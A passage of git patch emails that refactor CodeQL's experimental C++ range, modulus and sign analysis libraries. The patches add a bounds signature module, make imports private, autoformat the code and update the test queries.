inp) and phibound.getAVariable() = phi and ssaModulus(inp, edge, phibound, v, m) and @@ -158,7 +158,7 @@ module ModulusAnalysis U> { /** * Holds if `b + val` modulo `mod` is a candidate congruence class for `phi`. */ - private predicate phiModulusInit(SemSsaPhiNode phi, SemBound b, int val, int mod) { + private predicate phiModulusInit(SemSsaPhiNode phi, Bounds::SemBound b, int val, int mod) { exists(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | edge.phiInput(phi, inp) and ssaModulus(inp, edge, b, val, mod) @@ -169,7 +169,7 @@ module ModulusAnalysis U> { * Holds if all inputs to `phi` numbered `1` to `rix` are equal to `b + val` modulo `mod`. */ pragma[nomagic] - private predicate phiModulusRankStep(SemSsaPhiNode phi, SemBound b, int val, int mod, int rix) { + private predicate phiModulusRankStep(SemSsaPhiNode phi, Bounds::SemBound b, int val, int mod, int rix) { /* * base case. If any phi input is equal to `b + val` modulo `mod`, that's a potential congruence * class for the phi node. @@ -213,7 +213,7 @@ module ModulusAnalysis U> { /** * Holds if `phi` is equal to `b + val` modulo `mod`. */ - private predicate phiModulus(SemSsaPhiNode phi, SemBound b, int val, int mod) { + private predicate phiModulus(SemSsaPhiNode phi, Bounds::SemBound b, int val, int mod) { exists(int r | maxPhiInputRank(phi, r) and phiModulusRankStep(phi, b, val, mod, r) @@ -224,11 +224,11 @@ module ModulusAnalysis U> { * Holds if `v` at `pos` is equal to `b + val` modulo `mod`. */ private predicate ssaModulus( - SemSsaVariable v, SemSsaReadPosition pos, SemBound b, int val, int mod + SemSsaVariable v, SemSsaReadPosition pos, Bounds::SemBound b, int val, int mod ) { phiModulus(v, b, val, mod) and pos.hasReadOfVar(v) or - b.(SemSsaBound).getAVariable() = v and pos.hasReadOfVar(v) and val = 0 and mod = 0 + b.(Bounds::SemSsaBound).getAVariable() = v and pos.hasReadOfVar(v) and val = 0 and mod = 0 or exists(SemExpr e, int val0, int delta | semExprModulus(e, b, val0, mod) and @@ -236,7 +236,7 @@ module ModulusAnalysis U> { val = remainder(val0 + delta, mod) ) or - moduloGuardedRead(v, pos, val, mod) and b instanceof SemZeroBound + moduloGuardedRead(v, pos, val, mod) and b instanceof Bounds::SemZeroBound } /** @@ -247,14 +247,14 @@ module ModulusAnalysis U> { * - `mod > 1`: `val` lies within the range `[0 .. mod-1]`. */ cached - predicate semExprModulus(SemExpr e, SemBound b, int val, int mod) { + predicate semExprModulus(SemExpr e, Bounds::SemBound b, int val, int mod) { not ignoreExprModulus(e) and ( - e = b.getExpr(val) and mod = 0 + e = b.getExpr(D::fromInt(val)) and mod = 0 or evenlyDivisibleExpr(e, mod) and val = 0 and - b instanceof SemZeroBound + b instanceof Bounds::SemZeroBound or exists(SemSsaVariable v, SemSsaReadPositionBlock bb | ssaModulus(v, bb, b, val, mod) and @@ -277,21 +277,21 @@ module ModulusAnalysis U> { val = remainder(v1, mod) ) or - exists(SemBound b1, SemBound b2, int v1, int v2, int m1, int m2 | + exists(Bounds::SemBound b1, Bounds::SemBound b2, int v1, int v2, int m1, int m2 | addModulus(e, true, b1, v1, m1) and addModulus(e, false, b2, v2, m2) and mod = m1.gcd(m2) and mod != 1 and val = remainder(v1 + v2, mod) | - b = b1 and b2 instanceof SemZeroBound + b = b1 and b2 instanceof Bounds::SemZeroBound or - b = b2 and b1 instanceof SemZeroBound + b = b2 and b1 instanceof Bounds::SemZeroBound ) or exists(int v1, int v2, int m1, int m2 | subModulus(e, true, b, v1, m1) and - subModulus(e, false, any(SemZeroBound zb), v2, m2) and + subModulus(e, false, any(Bounds::SemZeroBound zb), v2, m2) and mod = m1.gcd(m2) and mod != 1 and val = remainder(v1 - v2, mod) @@ -300,12 +300,12 @@ module ModulusAnalysis U> { } private predicate condExprBranchModulus( - SemConditionalExpr cond, boolean branch, SemBound b, int val, int mod + SemConditionalExpr cond, boolean branch, Bounds::SemBound b, int val, int mod ) { semExprModulus(cond.getBranchExpr(branch), b, val, mod) } - private predicate addModulus(SemExpr add, boolean isLeft, SemBound b, int val, int mod) { + private predicate addModulus(SemExpr add, boolean isLeft, Bounds::SemBound b, int val, int mod) { exists(SemExpr larg, SemExpr rarg | nonConstAddition(add, larg, rarg) | semExprModulus(larg, b, val, mod) and isLeft = true or @@ -313,7 +313,7 @@ module ModulusAnalysis U> { ) } - private predicate subModulus(SemExpr sub, boolean isLeft, SemBound b, int val, int mod) { + private predicate subModulus(SemExpr sub, boolean isLeft, Bounds::SemBound b, int val, int mod) { exists(SemExpr larg, SemExpr rarg | nonConstSubtraction(sub, larg, rarg) | semExprModulus(larg, b, val, mod) and isLeft = true or diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll index 378bdd2dfc6..6a4b209bb4b 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll @@ -2,6 +2,23 @@ private import RangeAnalysisStage private import RangeAnalysisSpecific private import FloatDelta private import RangeUtils +private import experimental.semmle.code.cpp.semantic.SemanticBound as SemanticBound -private module CppRangeAnalysis = RangeStage>; -import CppRangeAnalysis \ No newline at end of file +module Bounds implements BoundSig { + class SemBound instanceof SemanticBound::SemBound { + string toString() { result = super.toString() } + + SemExpr getExpr(float delta) { result = super.getExpr(delta) } + } + + class SemZeroBound extends SemBound instanceof SemanticBound::SemZeroBound { } + + class SemSsaBound extends SemBound instanceof SemanticBound::SemSsaBound { + SemSsaVariable getAVariable() { result = this.(SemanticBound::SemSsaBound).getAVariable() } + } +} + +private module CppRangeAnalysis = + RangeStage>; + +import CppRangeAnalysis diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll index 769538fc4cf..8f64d891de2 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll @@ -89,4 +89,4 @@ module CppLangImpl implements LangSig { * actually references but whose values can be tracked as the type contained in the box. */ SemType getAlternateTypeForSsaVariable(SemSsaVariable var) { none() } -} \ No newline at end of file +} diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll index 0da8dc570d4..56afe92f3cc 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll @@ -66,7 +66,12 @@ private import RangeUtils as Utils private import SignAnalysisCommon private import ModulusAnalysis -private import experimental.semmle.code.cpp.semantic.Semantic +import experimental.semmle.code.cpp.semantic.SemanticExpr +import experimental.semmle.code.cpp.semantic.SemanticSSA +import experimental.semmle.code.cpp.semantic.SemanticGuard +import experimental.semmle.code.cpp.semantic.SemanticCFG +import experimental.semmle.code.cpp.semantic.SemanticType +import experimental.semmle.code.cpp.semantic.SemanticOpcode private import ConstantAnalysis /** @@ -222,7 +227,19 @@ signature module UtilSig { SemType getTrackedType(SemExpr e); } -module RangeStage LangParam, UtilSig UtilParam> { +signature module BoundSig { + class SemBound { + SemExpr getExpr(D::Delta delta); + } + class SemZeroBound extends SemBound; + class SemSsaBound extends SemBound { + SemSsaVariable getAVariable(); + } +} + +module RangeStage Bounds, LangSig LangParam, UtilSig UtilParam> { + import Bounds // TODO: remove this import? + /** * An expression that does conversion, boxing, or unboxing */ @@ -270,7 +287,7 @@ module RangeStage LangParam, UtilSig UtilParam> { private import SignAnalysisInstantiated - private module ModulusAnalysisInstantiated = ModulusAnalysis; // TODO: will this cause reevaluation if it's instantiated with the same DeltaSig and UtilParam multiple times? + private module ModulusAnalysisInstantiated = ModulusAnalysis; // TODO: will this cause reevaluation if it's instantiated with the same DeltaSig and UtilParam multiple times? private import ModulusAnalysisInstantiated @@ -906,7 +923,7 @@ module RangeStage LangParam, UtilSig UtilParam> { ) { not Specific::ignoreExprBound(e) and ( - e = b.getExpr(delta) and + e = b.getExpr(D::fromFloat(delta)) and (upper = true or upper = false) and fromBackEdge = false and origdelta = delta and From 6db728190ef4b08ef4fac94f456bda2677922e38 Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Mon, 19 Dec 2022 12:38:57 -0500 Subject: [PATCH 252/381] C++: autoformat --- .../code/cpp/semantic/analysis/FloatDelta.qll | 37 +++++++++---------- .../cpp/semantic/analysis/ModulusAnalysis.qll | 4 +- .../semantic/analysis/RangeAnalysisStage.qll | 2 + .../code/cpp/semantic/analysis/RangeUtils.qll | 4 +- 4 files changed, 26 insertions(+), 21 deletions(-) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll index 1fe1f59eef8..7011f52a1b0 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/FloatDelta.qll @@ -1,22 +1,21 @@ private import RangeAnalysisStage module FloatDelta implements DeltaSig { - class Delta = float; - - bindingset[d] - bindingset[result] - float toFloat(Delta d) {result = d} - - bindingset[d] - bindingset[result] - int toInt(Delta d) {result = d} - - - bindingset[n] - bindingset[result] Delta fromInt(int n) {result = n} - - - bindingset[f] - bindingset[result] Delta fromFloat(float f) {result = f} - } - \ No newline at end of file + class Delta = float; + + bindingset[d] + bindingset[result] + float toFloat(Delta d) { result = d } + + bindingset[d] + bindingset[result] + int toInt(Delta d) { result = d } + + bindingset[n] + bindingset[result] + Delta fromInt(int n) { result = n } + + bindingset[f] + bindingset[result] + Delta fromFloat(float f) { result = f } +} diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/ModulusAnalysis.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/ModulusAnalysis.qll index 562e60db408..acb5436e9c9 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/ModulusAnalysis.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/ModulusAnalysis.qll @@ -169,7 +169,9 @@ module ModulusAnalysis Bounds, UtilSig U> { * Holds if all inputs to `phi` numbered `1` to `rix` are equal to `b + val` modulo `mod`. */ pragma[nomagic] - private predicate phiModulusRankStep(SemSsaPhiNode phi, Bounds::SemBound b, int val, int mod, int rix) { + private predicate phiModulusRankStep( + SemSsaPhiNode phi, Bounds::SemBound b, int val, int mod, int rix + ) { /* * base case. If any phi input is equal to `b + val` modulo `mod`, that's a potential congruence * class for the phi node. diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll index 56afe92f3cc..7fd051aed7e 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll @@ -231,7 +231,9 @@ signature module BoundSig { class SemBound { SemExpr getExpr(D::Delta delta); } + class SemZeroBound extends SemBound; + class SemSsaBound extends SemBound { SemSsaVariable getAVariable(); } diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeUtils.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeUtils.qll index bc10fe156be..a2d10cdab30 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeUtils.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeUtils.qll @@ -49,7 +49,9 @@ module RangeUtil Lang> implements Range::Ut * - `isEq = true` : `v == e + delta` * - `isEq = false` : `v != e + delta` */ - SemGuard semEqFlowCond(SemSsaVariable v, SemExpr e, D::Delta delta, boolean isEq, boolean testIsTrue) { + SemGuard semEqFlowCond( + SemSsaVariable v, SemExpr e, D::Delta delta, boolean isEq, boolean testIsTrue + ) { exists(boolean eqpolarity | result.isEquality(semSsaRead(v, delta), e, eqpolarity) and (testIsTrue = true or testIsTrue = false) and From 23281410e3acfc095b8500f5a906ab340cbeab98 Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Tue, 20 Dec 2022 10:13:48 -0500 Subject: [PATCH 253/381] C++: Make bounds import private to preserve API --- .../semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll index 7fd051aed7e..7a2a3f6efbf 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll @@ -240,7 +240,7 @@ signature module BoundSig { } module RangeStage Bounds, LangSig LangParam, UtilSig UtilParam> { - import Bounds // TODO: remove this import? + private import Bounds // TODO: remove this import? /** * An expression that does conversion, boxing, or unboxing From 488368ecde435bb84881c85650e5f077017d8228 Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Tue, 3 Jan 2023 12:35:40 -0500 Subject: [PATCH 254/381] C++: private import for module params --- .../semantic/analysis/RangeAnalysisStage.qll | 61 ++++++++++--------- 1 file changed, 31 insertions(+), 30 deletions(-) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll index 7a2a3f6efbf..1fa1f76bc63 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll @@ -240,7 +240,10 @@ signature module BoundSig { } module RangeStage Bounds, LangSig LangParam, UtilSig UtilParam> { - private import Bounds // TODO: remove this import? + private import Bounds + private import LangParam + private import UtilParam + private import D /** * An expression that does conversion, boxing, or unboxing @@ -264,8 +267,8 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< */ private class SafeCastExpr extends ConvertOrBoxExpr { SafeCastExpr() { - conversionCannotOverflow(UtilParam::getTrackedType(pragma[only_bind_into](getOperand())), - UtilParam::getTrackedType(this)) + conversionCannotOverflow(getTrackedType(pragma[only_bind_into](getOperand())), + getTrackedType(this)) } } @@ -275,14 +278,14 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< private class NarrowingCastExpr extends ConvertOrBoxExpr { NarrowingCastExpr() { not this instanceof SafeCastExpr and - typeBound(UtilParam::getTrackedType(this), _, _) + typeBound(getTrackedType(this), _, _) } /** Gets the lower bound of the resulting type. */ - int getLowerBound() { typeBound(UtilParam::getTrackedType(this), result, _) } + int getLowerBound() { typeBound(getTrackedType(this), result, _) } /** Gets the upper bound of the resulting type. */ - int getUpperBound() { typeBound(UtilParam::getTrackedType(this), _, result) } + int getUpperBound() { typeBound(getTrackedType(this), _, result) } } private module SignAnalysisInstantiated = SignAnalysis; // TODO: will this cause reevaluation if it's instantiated with the same DeltaSig and UtilParam multiple times? @@ -318,7 +321,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< */ cached predicate possibleReason(SemGuard guard) { - guard = boundFlowCond(_, _, _, _, _) or guard = UtilParam::semEqFlowCond(_, _, _, _, _) + guard = boundFlowCond(_, _, _, _, _) or guard = semEqFlowCond(_, _, _, _, _) } } @@ -346,11 +349,11 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< private predicate boundCondition( SemRelationalExpr comp, SemSsaVariable v, SemExpr e, float delta, boolean upper ) { - comp.getLesserOperand() = UtilParam::semSsaRead(v, D::fromFloat(delta)) and + comp.getLesserOperand() = semSsaRead(v, fromFloat(delta)) and e = comp.getGreaterOperand() and upper = true or - comp.getGreaterOperand() = UtilParam::semSsaRead(v, D::fromFloat(delta)) and + comp.getGreaterOperand() = semSsaRead(v, fromFloat(delta)) and e = comp.getLesserOperand() and upper = false or @@ -358,7 +361,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< // (v - d) - e < c comp.getLesserOperand() = sub and comp.getGreaterOperand() = c and - sub.getLeftOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and + sub.getLeftOperand() = semSsaRead(v, fromFloat(d)) and sub.getRightOperand() = e and upper = true and delta = d + c.getIntValue() @@ -366,7 +369,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< // (v - d) - e > c comp.getGreaterOperand() = sub and comp.getLesserOperand() = c and - sub.getLeftOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and + sub.getLeftOperand() = semSsaRead(v, fromFloat(d)) and sub.getRightOperand() = e and upper = false and delta = d + c.getIntValue() @@ -375,7 +378,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< comp.getLesserOperand() = sub and comp.getGreaterOperand() = c and sub.getLeftOperand() = e and - sub.getRightOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and + sub.getRightOperand() = semSsaRead(v, fromFloat(d)) and upper = false and delta = d - c.getIntValue() or @@ -383,7 +386,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< comp.getGreaterOperand() = sub and comp.getLesserOperand() = c and sub.getLeftOperand() = e and - sub.getRightOperand() = UtilParam::semSsaRead(v, D::fromFloat(d)) and + sub.getRightOperand() = semSsaRead(v, fromFloat(d)) and upper = true and delta = d - c.getIntValue() ) @@ -453,8 +456,8 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< ) and ( if - UtilParam::getTrackedTypeForSsaVariable(v) instanceof SemIntegerType or - UtilParam::getTrackedTypeForSsaVariable(v) instanceof SemAddressType + getTrackedTypeForSsaVariable(v) instanceof SemIntegerType or + getTrackedTypeForSsaVariable(v) instanceof SemAddressType then upper = true and strengthen = -1 or @@ -479,7 +482,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< semImplies_v2(result, testIsTrue, boundFlowCond(v, e, delta, upper, testIsTrue0), testIsTrue0) ) or - result = UtilParam::semEqFlowCond(v, e, D::fromFloat(delta), true, testIsTrue) and + result = semEqFlowCond(v, e, fromFloat(delta), true, testIsTrue) and (upper = true or upper = false) or // guard that tests whether `v2` is bounded by `e + delta + d1 - d2` and @@ -487,9 +490,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< exists( SemSsaVariable v2, SemGuard guardEq, boolean eqIsTrue, float d1, float d2, float oldDelta | - guardEq = - UtilParam::semEqFlowCond(v, UtilParam::semSsaRead(v2, D::fromFloat(d1)), D::fromFloat(d2), - true, eqIsTrue) and + guardEq = semEqFlowCond(v, semSsaRead(v2, fromFloat(d1)), fromFloat(d2), true, eqIsTrue) and result = boundFlowCond(v2, e, oldDelta, upper, testIsTrue) and // guardEq needs to control guard guardEq.directlyControls(result.getBasicBlock(), eqIsTrue) and @@ -536,7 +537,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, float delta, boolean upper, SemReason reason ) { - UtilParam::semSsaUpdateStep(v, e, D::fromFloat(delta)) and + semSsaUpdateStep(v, e, fromFloat(delta)) and pos.hasReadOfVar(v) and (upper = true or upper = false) and reason = TSemNoReason() @@ -553,10 +554,10 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< private predicate unequalFlowStepIntegralSsa( SemSsaVariable v, SemSsaReadPosition pos, SemExpr e, float delta, SemReason reason ) { - UtilParam::getTrackedTypeForSsaVariable(v) instanceof SemIntegerType and + getTrackedTypeForSsaVariable(v) instanceof SemIntegerType and exists(SemGuard guard, boolean testIsTrue | pos.hasReadOfVar(v) and - guard = UtilParam::semEqFlowCond(v, e, D::fromFloat(delta), false, testIsTrue) and + guard = semEqFlowCond(v, e, fromFloat(delta), false, testIsTrue) and semGuardDirectlyControlsSsaRead(guard, pos, testIsTrue) and reason = TSemCondReason(guard) ) @@ -564,12 +565,12 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< /** Holds if `e >= 1` as determined by sign analysis. */ private predicate strictlyPositiveIntegralExpr(SemExpr e) { - semStrictlyPositive(e) and UtilParam::getTrackedType(e) instanceof SemIntegerType + semStrictlyPositive(e) and getTrackedType(e) instanceof SemIntegerType } /** Holds if `e <= -1` as determined by sign analysis. */ private predicate strictlyNegativeIntegralExpr(SemExpr e) { - semStrictlyNegative(e) and UtilParam::getTrackedType(e) instanceof SemIntegerType + semStrictlyNegative(e) and getTrackedType(e) instanceof SemIntegerType } /** @@ -578,7 +579,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * - `upper = false` : `e2 >= e1 + delta` */ private predicate boundFlowStep(SemExpr e2, SemExpr e1, float delta, boolean upper) { - UtilParam::semValueFlowStep(e2, e1, D::fromFloat(delta)) and + semValueFlowStep(e2, e1, fromFloat(delta)) and (upper = true or upper = false) or e2.(SafeCastExpr).getOperand() = e1 and @@ -641,7 +642,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< delta = 0 and upper = false or - LangParam::hasBound(e2, e1, D::fromFloat(delta), upper) + hasBound(e2, e1, fromFloat(delta), upper) } /** Holds if `e2 = e1 * factor` and `factor > 0`. */ @@ -883,13 +884,13 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< * (for `upper = false`) bound of `b`. */ private predicate baseBound(SemExpr e, float b, boolean upper) { - LangParam::hasConstantBound(e, D::fromFloat(b), upper) + hasConstantBound(e, fromFloat(b), upper) or upper = false and b = 0 and semPositive(e.(SemBitAndExpr).getAnOperand()) and // REVIEW: We let the language opt out here to preserve original results. - not LangParam::ignoreZeroLowerBound(e) + not ignoreZeroLowerBound(e) } /** @@ -923,9 +924,9 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< SemExpr e, SemBound b, float delta, boolean upper, boolean fromBackEdge, float origdelta, SemReason reason ) { - not Specific::ignoreExprBound(e) and + not ignoreExprBound(e) and ( - e = b.getExpr(D::fromFloat(delta)) and + e = b.getExpr(fromFloat(delta)) and (upper = true or upper = false) and fromBackEdge = false and origdelta = delta and From 7586762b103a942a0e93aa603e3d597717f4f8fb Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Tue, 3 Jan 2023 17:55:12 -0500 Subject: [PATCH 255/381] C++: fix ambiguous import warnings --- .../semmle/code/cpp/semantic/analysis/RangeAnalysis.qll | 2 +- .../semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll | 2 +- .../semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll index 6a4b209bb4b..50d604dee97 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll @@ -1,6 +1,6 @@ private import RangeAnalysisStage private import RangeAnalysisSpecific -private import FloatDelta +private import experimental.semmle.code.cpp.semantic.analysis.FloatDelta private import RangeUtils private import experimental.semmle.code.cpp.semantic.SemanticBound as SemanticBound diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll index 8f64d891de2..34d5bca116b 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisSpecific.qll @@ -4,7 +4,7 @@ private import experimental.semmle.code.cpp.semantic.Semantic private import RangeAnalysisStage -private import FloatDelta +private import experimental.semmle.code.cpp.semantic.analysis.FloatDelta module CppLangImpl implements LangSig { /** diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll index 1fa1f76bc63..6458fb6a8dc 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll @@ -65,7 +65,7 @@ private import RangeUtils as Utils private import SignAnalysisCommon -private import ModulusAnalysis +private import experimental.semmle.code.cpp.semantic.analysis.ModulusAnalysis import experimental.semmle.code.cpp.semantic.SemanticExpr import experimental.semmle.code.cpp.semantic.SemanticSSA import experimental.semmle.code.cpp.semantic.SemanticGuard From 938176c9dab3bfbb05becb872aeb60f48daf48ab Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Wed, 4 Jan 2023 15:19:33 -0500 Subject: [PATCH 256/381] C++: update test QL for modulus and sign analysis These now instantiate their respective parameterized modules. No results change. --- .../library-tests/ir/modulus-analysis/ModulusAnalysis.ql | 9 ++++++++- .../test/library-tests/ir/sign-analysis/SignAnalysis.ql | 9 ++++++++- 2 files changed, 16 insertions(+), 2 deletions(-) diff --git a/cpp/ql/test/library-tests/ir/modulus-analysis/ModulusAnalysis.ql b/cpp/ql/test/library-tests/ir/modulus-analysis/ModulusAnalysis.ql index 794dbed9628..bb335a0b30f 100644 --- a/cpp/ql/test/library-tests/ir/modulus-analysis/ModulusAnalysis.ql +++ b/cpp/ql/test/library-tests/ir/modulus-analysis/ModulusAnalysis.ql @@ -1,9 +1,16 @@ import cpp import experimental.semmle.code.cpp.semantic.analysis.ModulusAnalysis import experimental.semmle.code.cpp.semantic.Semantic +import experimental.semmle.code.cpp.semantic.analysis.RangeUtils +import experimental.semmle.code.cpp.semantic.analysis.FloatDelta +import experimental.semmle.code.cpp.semantic.analysis.RangeAnalysisSpecific +import experimental.semmle.code.cpp.semantic.analysis.RangeAnalysis import semmle.code.cpp.ir.IR as IR import TestUtilities.InlineExpectationsTest +module ModulusAnalysisInstantiated = + ModulusAnalysis>; + class ModulusAnalysisTest extends InlineExpectationsTest { ModulusAnalysisTest() { this = "ModulusAnalysisTest" } @@ -23,7 +30,7 @@ class ModulusAnalysisTest extends InlineExpectationsTest { private string getAModString(SemExpr e) { exists(SemBound b, int delta, int mod | - semExprModulus(e, b, delta, mod) and + ModulusAnalysisInstantiated::semExprModulus(e, b, delta, mod) and result = b.toString() + "," + delta.toString() + "," + mod.toString() and not (delta = 0 and mod = 0) ) diff --git a/cpp/ql/test/library-tests/ir/sign-analysis/SignAnalysis.ql b/cpp/ql/test/library-tests/ir/sign-analysis/SignAnalysis.ql index c41ed2cb200..d4f499fdc61 100644 --- a/cpp/ql/test/library-tests/ir/sign-analysis/SignAnalysis.ql +++ b/cpp/ql/test/library-tests/ir/sign-analysis/SignAnalysis.ql @@ -1,9 +1,14 @@ import cpp import experimental.semmle.code.cpp.semantic.analysis.SignAnalysisCommon import experimental.semmle.code.cpp.semantic.Semantic +import experimental.semmle.code.cpp.semantic.analysis.RangeUtils +import experimental.semmle.code.cpp.semantic.analysis.FloatDelta +import experimental.semmle.code.cpp.semantic.analysis.RangeAnalysisSpecific import semmle.code.cpp.ir.IR as IR import TestUtilities.InlineExpectationsTest +module SignAnalysisInstantiated = SignAnalysis>; + class SignAnalysisTest extends InlineExpectationsTest { SignAnalysisTest() { this = "SignAnalysisTest" } @@ -21,4 +26,6 @@ class SignAnalysisTest extends InlineExpectationsTest { } } -private string getASignString(SemExpr e) { result = strictconcat(semExprSign(e).toString(), "") } +private string getASignString(SemExpr e) { + result = strictconcat(SignAnalysisInstantiated::semExprSign(e).toString(), "") +} From 31b61b1aa630ae1243443a927685345e2f4486de Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Mon, 9 Jan 2023 13:56:24 -0500 Subject: [PATCH 257/381] C++: fix a join order in range analysis --- .../semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll index 6458fb6a8dc..2cf224ac785 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysisStage.qll @@ -268,7 +268,7 @@ module RangeStage Bounds, LangSig LangParam, UtilSig< private class SafeCastExpr extends ConvertOrBoxExpr { SafeCastExpr() { conversionCannotOverflow(getTrackedType(pragma[only_bind_into](getOperand())), - getTrackedType(this)) + pragma[only_bind_out](getTrackedType(this))) } } From b2b45237c63ec3235958e35e83447ad9566b041c Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Tue, 10 Jan 2023 14:01:32 -0500 Subject: [PATCH 258/381] C++: use rounding to prevent float wobble in range analysis --- .../code/cpp/semantic/analysis/FloatDelta.qll | 3 +- .../analysis/RangeAnalysisSpecific.qll | 1 + .../semantic/analysis/RangeAnalysisStage.qll | 240 ++++++++++-------- .../code/cpp/semantic/analysis/RangeUtils.qll | 6 +- 4 files changed, 137 insertions(+), 113 deletions(-) diff --git 